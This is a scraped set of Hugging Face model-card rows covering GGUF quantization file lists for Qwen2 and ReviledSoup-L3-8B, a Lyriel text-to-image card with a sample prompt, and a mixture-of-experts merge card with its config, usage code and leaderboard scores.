| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2-1.5b-ETS-GGUF/resolve/main/Qwen2-1.5b-ETS.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/ReviledSoup-L3-8B-i1-GGUF | mradermacher | "2024-06-08T11:53:19Z" | 3,543 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"en",
"base_model:Revile/ReviledSoup-L3-8B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-08T10:39:15Z" | ---
base_model: Revile/ReviledSoup-L3-8B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: nicoboss -->
weighted/imatrix quants of https://huggingface.co/Revile/ReviledSoup-L3-8B
<!-- provided-files -->
static quants are available at https://huggingface.co/mradermacher/ReviledSoup-L3-8B-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ1_S.gguf) | i1-IQ1_S | 2.1 | for the desperate |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ1_M.gguf) | i1-IQ1_M | 2.3 | mostly desperate |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 2.5 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_XS.gguf) | i1-IQ2_XS | 2.7 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_S.gguf) | i1-IQ2_S | 2.9 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ2_M.gguf) | i1-IQ2_M | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q2_K.gguf) | i1-Q2_K | 3.3 | IQ3_XXS probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 3.4 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_XS.gguf) | i1-IQ3_XS | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_S.gguf) | i1-Q3_K_S | 3.8 | IQ3_XS probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_S.gguf) | i1-IQ3_S | 3.8 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ3_M.gguf) | i1-IQ3_M | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_M.gguf) | i1-Q3_K_M | 4.1 | IQ3_S probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q3_K_L.gguf) | i1-Q3_K_L | 4.4 | IQ3_M probably better |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-IQ4_XS.gguf) | i1-IQ4_XS | 4.5 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_0.gguf) | i1-Q4_0 | 4.8 | fast, low quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_K_S.gguf) | i1-Q4_K_S | 4.8 | optimal size/speed/quality |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q4_K_M.gguf) | i1-Q4_K_M | 5.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q5_K_S.gguf) | i1-Q5_K_S | 5.7 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q5_K_M.gguf) | i1-Q5_K_M | 5.8 | |
| [GGUF](https://huggingface.co/mradermacher/ReviledSoup-L3-8B-i1-GGUF/resolve/main/ReviledSoup-L3-8B.i1-Q6_K.gguf) | i1-Q6_K | 6.7 | practically like static Q6_K |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his hardware for calculating the imatrix for these quants.
<!-- end -->
|
Yntec/Lyriel | Yntec | "2023-10-13T02:39:06Z" | 3,542 | 2 | diffusers | [
"diffusers",
"safetensors",
"General",
"Fantasy",
"Banned",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-10-13T00:41:22Z" | ---
license: creativeml-openrail-m
library_name: diffusers
pipeline_tag: text-to-image
tags:
- General
- Fantasy
- Banned
- stable-diffusion
- stable-diffusion-diffusers
- diffusers
- text-to-image
---
# Lyriel 1.2
Original model page: https://civitai.com/models/22922?modelVersionId=32704
Sample and prompt:

Pretty CUTE Girl, playing videogame, sitting on tv monitor, gorgeous detailed hair, curly bangs, Ponytail, sneakers Magazine ad, DETAILED CHIBI EYES, iconic, 1940, sharp focus. Illustration By ROSSDRAWS and KlaysMoji and Dave Rapoza and artgerm and leyendecker and Clay Mann |
jsfs11/MixtureofMerges-MoE-4x7b-v4 | jsfs11 | "2024-03-03T00:04:37Z" | 3,542 | 3 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"flemmingmiguel/MBX-7B-v3",
"Kukedlc/NeuTrixOmniBe-7B-model-remix",
"PetroGPT/WestSeverus-7B-DPO",
"vanillaOVO/supermario_v4",
"base_model:flemmingmiguel/MBX-7B-v3",
"base_model:Kukedlc/NeuTrixOmniBe-7B-model-remix",
"base_model:PetroGPT/WestSeverus-7B-DPO",
"base_model:vanillaOVO/supermario_v4",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-02-11T06:55:36Z" | ---
license: apache-2.0
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
- flemmingmiguel/MBX-7B-v3
- Kukedlc/NeuTrixOmniBe-7B-model-remix
- PetroGPT/WestSeverus-7B-DPO
- vanillaOVO/supermario_v4
base_model:
- flemmingmiguel/MBX-7B-v3
- Kukedlc/NeuTrixOmniBe-7B-model-remix
- PetroGPT/WestSeverus-7B-DPO
- vanillaOVO/supermario_v4
model-index:
- name: MixtureofMerges-MoE-4x7b-v4
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 72.53
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 88.85
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 64.53
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 75.3
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 84.85
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 71.34
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=jsfs11/MixtureofMerges-MoE-4x7b-v4
name: Open LLM Leaderboard
---
# MixtureofMerges-MoE-4x7b-v4
MixtureofMerges-MoE-4x7b-v4 is a Mixure of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [flemmingmiguel/MBX-7B-v3](https://huggingface.co/flemmingmiguel/MBX-7B-v3)
* [Kukedlc/NeuTrixOmniBe-7B-model-remix](https://huggingface.co/Kukedlc/NeuTrixOmniBe-7B-model-remix)
* [PetroGPT/WestSeverus-7B-DPO](https://huggingface.co/PetroGPT/WestSeverus-7B-DPO)
* [vanillaOVO/supermario_v4](https://huggingface.co/vanillaOVO/supermario_v4)
## 🧩 Configuration
```yaml
base_model: Kukedlc/NeuTrixOmniBe-7B-model-remix
gate_mode: hidden
dtype: bfloat16
experts:
- source_model: flemmingmiguel/MBX-7B-v3
positive_prompts:
- "Answer this question from the ARC (Argument Reasoning Comprehension)."
- "Use common sense and logical reasoning skills."
- "What assumptions does this argument rely on?"
- "Are these assumptions valid? Explain."
- "Could this be explained in a different way? Provide an alternative explanation."
- "Identify any weaknesses in this argument."
- "Does this argument contain any logical fallacies? If so, which ones?"
negative_prompts:
- "misses key evidence"
- "overly general"
- "focuses on irrelevant details"
- "assumes information not provided"
- "relies on stereotypes"
- source_model: Kukedlc/NeuTrixOmniBe-7B-model-remix
positive_prompts:
- "Answer this question, demonstrating commonsense understanding and using any relevant general knowledge you may have."
- "Provide a concise summary of this passage, then explain why the highlighted section is essential to the main idea."
- "Read these two brief articles presenting different viewpoints on the same topic. List their key arguments and highlight where they disagree."
- "Paraphrase this statement, changing the emotional tone but keeping the core meaning intact. Example: Rephrase a worried statement in a humorous way"
- "Create a short analogy that helps illustrate the main concept of this article."
negative_prompts:
- "sounds too basic"
- "understated"
- "dismisses important details"
- "avoids the question's nuance"
- "takes this statement too literally"
- source_model: PetroGPT/WestSeverus-7B-DPO
positive_prompts:
- "Calculate the answer to this math problem"
- "My mathematical capabilities are strong, allowing me to handle complex mathematical queries"
- "solve for"
- "A store sells apples at $0.50 each. If Emily buys 12 apples, how much does she need to pay?"
- "Isolate x in the following equation: 2x + 5 = 17"
- "Solve this equation and show your working."
- "Explain why you used this formula to solve the problem."
- "Attempt to divide this number by zero. Explain why this cannot be done."
negative_prompts:
- "incorrect"
- "inaccurate"
- "creativity"
- "assumed without proof"
- "rushed calculation"
- "confuses mathematical concepts"
- "draws illogical conclusions"
- "circular reasoning"
- source_model: vanillaOVO/supermario_v4
positive_prompts:
- "Generate a few possible continuations to this scenario."
- "Demonstrate understanding of everyday commonsense in your response."
- "Use contextual clues to determine the most likely outcome."
- "Continue this scenario, but make the writing style sound archaic and overly formal."
- "This narrative is predictable. Can you introduce an unexpected yet plausible twist?"
- "The character is angry. Continue this scenario showcasing a furious outburst."
negative_prompts:
- "repetitive phrases"
- "overuse of the same words"
- "contradicts earlier statements - breaks the internal logic of the scenario"
- "out of character dialogue"
- "awkward phrasing - sounds unnatural"
- "doesn't match the given genre"
```
## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "jsfs11/MixtureofMerges-MoE-4x7b-v4"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_jsfs11__MixtureofMerges-MoE-4x7b-v4)
| Metric |Value|
|---------------------------------|----:|
|Avg. |76.23|
|AI2 Reasoning Challenge (25-Shot)|72.53|
|HellaSwag (10-Shot) |88.85|
|MMLU (5-Shot) |64.53|
|TruthfulQA (0-shot) |75.30|
|Winogrande (5-shot) |84.85|
|GSM8k (5-shot) |71.34|
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.